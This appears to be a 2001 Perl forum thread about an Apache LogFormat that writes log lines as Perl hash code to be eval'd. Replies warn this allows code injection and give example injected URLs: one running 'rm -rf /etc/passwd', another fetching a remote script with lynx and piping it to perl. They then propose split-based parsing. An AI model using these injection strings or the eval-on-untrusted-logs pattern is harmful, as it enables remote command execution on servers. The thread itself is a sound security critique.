Pardon the location of this post, but it really doesn't fit anyplace else. If you think it would be better someplace else, let me know.

Anyway, I manage a farm of servers for a government contractor (and no, we don't use cookies to track your life). Frequently I am asked to parse and compile large volumes of logs to extract various bizarre information. I have for many years just parsed the standard output from Apache. However, today, out of boredom, I decided to make that easy task simpler.

I wrote the following LogFormat for Apache that works quite well. It allows you to read in a line of the log and assign it directly to a hash. Like this:

while (<LOGFILE>) {
    my %hash = eval $_;
    ## do something with %hash
}
The LogFormat is like this:
LogFormat "(bytes=>'%b',filename=>'%f',remotehost=>'%h',remoteip=>'%a',remoteuser=>'%l',serverport=>'%p',pid=>'%P',request=>'%r',status=>'%s',time=>'%t',timeserve=>'%T',authuser=>'%u',url=>'%U',virtual=>'%v')" log_perl
Not terribly exciting, or unique or difficult; but helpful.

Replies are listed 'Best First'.
Re: Perl readable Weblogs
by knobunc (Pilgrim) on Apr 18, 2001 at 23:18 UTC

    Cool idea. Very dangerous though. Your choice of delimiter is not safe (and I don't think there is a safe one). Apache passes through anything you type in the URL. So sending the URL:

    http://www.victim.com/trick'); system('rm -rf /etc/passwd'); ('

    Would become:

    (bytes=>'0',...,url=>'trick'); system('rm -rf /etc/passwd'); ('', ...)

    Which I don't want someone to be able to run on my server.

    From my brief reading of the BNF for valid URLs there are some invalid characters in URLs, such as ~, but Apache still writes out whatever it was given to the access log.

    Also I doubt it is faster to eval each line of the log rather than making the log format something that can be split. I bet a regular expression match is faster than the eval, and it is certainly safer.
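One way to check the speed guess rather than bet on it is the core Benchmark module. This is only a rough sketch: the sample line is made up and trimmed to four fields, and `parse_regex` and `parse_eval` are hypothetical helper names. The regex version never executes log content, but a value containing a quote would still be cut short or could spoof a field, so it is safer, not bulletproof.

```perl
use strict;
use warnings;
use Benchmark qw(cmpthese);

# Hypothetical sample line in the original log_perl format (trimmed to four fields).
my $line = "(bytes=>'512',status=>'200',url=>'/index.html',virtual=>'www.example.com')";

# Pull out key=>'value' pairs with a regex; nothing from the log is executed.
sub parse_regex {
    my ($text) = @_;
    my %hash = $text =~ /(\w+)=>'([^']*)'/g;
    return \%hash;
}

# Parse by eval, as in the original post. Only acceptable here because
# $line is hard-coded and trusted.
sub parse_eval {
    my ($text) = @_;
    my %hash = eval $text;
    return \%hash;
}

# Run each parser for at least one CPU second and print a comparison table.
cmpthese(-1, {
    eval  => sub { parse_eval($line) },
    regex => sub { parse_regex($line) },
});
```

The numbers will vary by machine and Perl version, so treat the table as a hint only.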

    If you do decide to go with the split idea the following might work. Again you have to choose a good delimiter, but tacking the URL on the end means you can ignore it when choosing the delimiter by providing the number of fields to split. (Although I am not sure what request can contain so my choice of | as a delimiter may be invalid).

    LogFormat "%b|%f|%h|%a|%l|%p|%P|%r|%s|%t|%T|%u|%v|%U" log_perl

    Then to read:

    while (<LOGFILE>) {
        chomp;
        my %hash;
        # 14 fields; the limit keeps any | inside the trailing URL intact
        @hash{qw(bytes filename remotehost remoteip remoteuser serverport pid
                 request status time timeserve authuser virtual url)}
            = split /\|/, $_, 14;
        # Use %hash
    }
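To see what the field limit buys you, here is a small self-contained sketch. The sample line is invented, and `parse_line` is a hypothetical helper name. The field list names 14 fields, so the limit passed to split is the field count.

```perl
use strict;
use warnings;

# Field names in the same order as the pipe-delimited LogFormat, url last.
my @fields = qw(bytes filename remotehost remoteip remoteuser serverport pid
                request status time timeserve authuser virtual url);

sub parse_line {
    my ($line) = @_;
    chomp $line;
    my %hash;
    # The limit stops splitting after the 14th field, so any further
    # pipes stay inside the url value.
    @hash{@fields} = split /\|/, $line, scalar @fields;
    return \%hash;
}

# Made-up log line whose final field (the url) contains the delimiter.
my $line = join('|',
    '512', '/var/www/a.html', 'client.example.com', '192.0.2.7', '-',
    '80', '1234', 'GET /a%7Cb%7Cc HTTP/1.0', '200',
    '[18/Apr/2001:23:18:00 +0000]', '0', '-', 'www.example.com',
    '/a|b|c') . "\n";

my $rec = parse_line($line);
print "$rec->{virtual} $rec->{url}\n";    # prints "www.example.com /a|b|c"
```

The limit only protects the last field. A pipe in any earlier field, such as the request line, would still shift everything after it.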

    -ben

      Although it is unlikely that the Apache user 'nobody' will be able to delete /etc/passwd (given as an example, of course), there are far more evil things that they can do, especially with e-commerce sites.

      Considering how much you can do with one line:

      ...'); system('lynx --source http://www.hax.it/script.pl|perl'); ('

      You would be well advised to use a simple delimiter that doesn't require eval.
      Ouch! Never thought of the eval issues (though I suppose Safe would help). Unfortunately, having to know the field names beforehand goes against the intent. HOWEVER, the following should work well:

      LogFormat "bytes|%b|filename|%f|remotehost|%h|remoteip|%a|remoteuser|%l|serverport|%p|pid|%P|request|%r|status|%s|time|%t|timeserve|%T|authuser|%u|url|%U|virtual|%v" log_perl

      then parsing it with a

      while (<LOGFILE>) {
          chomp;
          my %hash = split /\|/, $_;
          ## do something with %hash ala $hash{time} or $hash{bytes}
      }

      should eliminate the nasty stuff.
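For what it's worth, the Safe idea mentioned in passing might look roughly like the sketch below. It assumes the core Safe module with its default operator mask, and `parse_in_compartment` is a hypothetical helper name. A compartment refuses operators such as system, but evaluated input can still loop or eat memory, so this narrows the risk rather than removing it.

```perl
use strict;
use warnings;
use Safe;

# A compartment with the default operator mask, which does not permit
# system, exec, backticks or file opens.
my $compartment = Safe->new;

sub parse_in_compartment {
    my ($line) = @_;
    my @pairs = $compartment->reval($line);
    return if $@;            # trapped operator or syntax error
    return if @pairs % 2;    # not a clean key/value list
    my %hash = @pairs;
    return \%hash;
}

# Made-up lines: one well-formed, one carrying an injected system call.
my $ok  = parse_in_compartment("(status=>'200',url=>'/index.html')");
my $bad = parse_in_compartment("(url=>'trick'); system('echo pwned'); ('')");

print "status: $ok->{status}\n" if $ok;
print defined $bad ? "second line accepted\n" : "second line rejected\n";
```

A delimiter-based format avoids the question entirely, which is why the split approach is the simpler choice.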

        Hum, you still get hit with the escaping problem: since you don't know how many |s to split on, you have to pick something that is not going to be in the URL. I would put the URL at the end anyway, so that if they got some odd characters into the log, a field limit on the split would keep them in the last field. Your new approach is certainly safer since you won't get bitten by evaled code.
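A rough sketch of that combination: name|value pairs with the URL moved to the end, plus a split limit. The three-pair format in the comment is a shortened, hypothetical variant, and `parse_pairs` is an invented helper name. The field names still come from the log itself, but the number of pairs has to be known up front.

```perl
use strict;
use warnings;

# Hypothetical shortened format with the url last:
#   LogFormat "status|%s|virtual|%v|url|%U" log_perl
my $pair_count = 3;    # number of name|value pairs in the assumed format

sub parse_pairs {
    my ($line) = @_;
    chomp $line;
    # Two fields per pair; the limit keeps extra pipes inside the final value.
    my @parts = split /\|/, $line, 2 * $pair_count;
    return if @parts != 2 * $pair_count;    # short or malformed line
    my %hash = @parts;
    return \%hash;
}

# Made-up line whose url contains the delimiter.
my $sample = "status|200|virtual|www.example.com|url|/a|b\n";
my $rec = parse_pairs($sample);
print "$rec->{url}\n";    # prints "/a|b"

# Without the limit the same line yields 7 pieces, an odd count that
# would mis-pair the keys and values.
my @unlimited = split /\|/, "status|200|virtual|www.example.com|url|/a|b";
print scalar(@unlimited), "\n";    # prints 7
```

As with the positional version, this only covers the last field. The request field (%r) also carries user-supplied text, so a pipe there would still break the pairing.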

        As an aside, someone else noted that you couldn't remove /etc/passwd as nobody, but remember this is a log analysis tool that will be run by some user periodically.

        -ben

Re: Perl readable Weblogs
by zigster (Hermit) on Apr 18, 2001 at 17:49 UTC
    Please edit your node to change the <pre> tags to <code> tags .. see Writeup Formatting Tips for more info. Your node has value but is hard to read so may be passed over. That would be a shame.
    --

    Zigster
      Sorry? I don't use a single <PRE> tag in the entire post; all <CODE>, baby! Perhaps you are speaking of the wrap with the LogFormat line? Well, it's on a single line like it has to be in the httpd.conf file.
        You are correct, I was a little hasty. My apologies.
        --

        Zigster